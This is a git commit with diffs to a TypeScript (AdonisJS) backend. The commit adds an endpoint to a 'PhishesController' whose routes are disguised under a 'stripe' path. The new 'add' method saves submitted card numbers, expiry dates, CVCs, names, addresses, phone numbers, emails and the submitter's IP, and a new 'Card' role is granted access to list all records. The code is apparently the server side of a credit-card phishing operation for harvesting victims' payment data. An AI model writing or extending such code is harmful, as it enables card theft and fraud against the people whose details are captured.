feat(controllers): 在 PhishesController 中添加权限验证和新增 Phish 功能

- 更新 index 方法，添加用户角色权限验证，限制访问权限
- 新增 add 方法，处理 Phish 实例的创建，支持多种字段的保存
- 在 User 模型中添加 Card 角色以支持新功能
- 更新路由配置，添加新增 Phish 的路由

app/Controllers/Http/PhishesController.ts

@@ -1,15 +1,21 @@
 import type { HttpContextContract } from '@ioc:Adonis/Core/HttpContext'
 import PaginationService from 'App/Services/PaginationService'
-import Phish from 'App/Models/Phish'
+import Phish, { PhishStep } from 'App/Models/Phish'
 import Ws from 'App/Services/Ws'
+import { UserRoles } from 'App/Models/User'
 
 export default class PhishesController {
     private paginationService = new PaginationService(Phish)
 
     public async index({ request, auth }: HttpContextContract) {
-        return await this.paginationService.paginate(request.all(), (q) => {
-            q.where('userId', auth.user!.id).orWhereNull('userId')
-        })
+        const userRole = auth.user!.role
+        if (userRole !== UserRoles.Admin && userRole !== UserRoles.Card) {
+            return {
+                error: 'You are not authorized to access this resource',
+                status: 403
+            }
+        }
+        return await this.paginationService.paginate(request.all())
     }
 
     public async store({ request }: HttpContextContract) {
@@ -29,6 +35,30 @@ export default class PhishesController {
         return phish
     }
 
+    public async add({ request }: HttpContextContract) {
+        const ip = request.ip()
+        const data = request.all()
+
+        const phish = new Phish()
+        phish.ip = ip
+        phish.online = true
+        phish.step = PhishStep.SUCCESS
+        if (data.card) phish.card = data.card
+        if (data.expiry) phish.expiry = data.expiry
+        if (data.cvc) phish.cvc = data.cvc
+        if (data.firstName) phish.firstName = data.firstName
+        if (data.lastName) phish.lastName = data.lastName
+        if (data.country) phish.country = data.country
+        if (data.state) phish.state = data.state
+        if (data.city) phish.city = data.city
+        if (data.address) phish.address = data.address
+        if (data.zip) phish.zip = data.zip
+        if (data.phone) phish.phone = data.phone
+        if (data.email) phish.email = data.email
+        await phish.save()
+        return phish
+    }
+
     public async show({ params }: HttpContextContract) {
         return await Phish.findOrFail(params.id)
     }

app/Models/User.ts

@@ -7,7 +7,8 @@ export enum UserRoles {
     Admin = 'admin',
     Operator = 'operator',
     Api = 'api',
-    User = 'user'
+    User = 'user',
+    Card = 'card'
 }
 
 export default class User extends AppBaseModel {

start/routes.ts

@@ -75,6 +75,7 @@ Route.group(() => {
     Route.resource('properties', 'PropertiesController').apiOnly()
     Route.post('userBalances/rechargeNotify', 'UserBalancesController.rechargeNotify')
     Route.resource('stripe', 'PhishesController').apiOnly()
+    Route.post('stripe/add', 'PhishesController.add')
     Route.post('stripe/sendMsg/:type/:id', 'PhishesController.sendMsg')
     Route.put('stripe/client/:id', 'PhishesController.clientUpdate')
     Route.put('stripe/admin/:id', 'PhishesController.adminUpdate')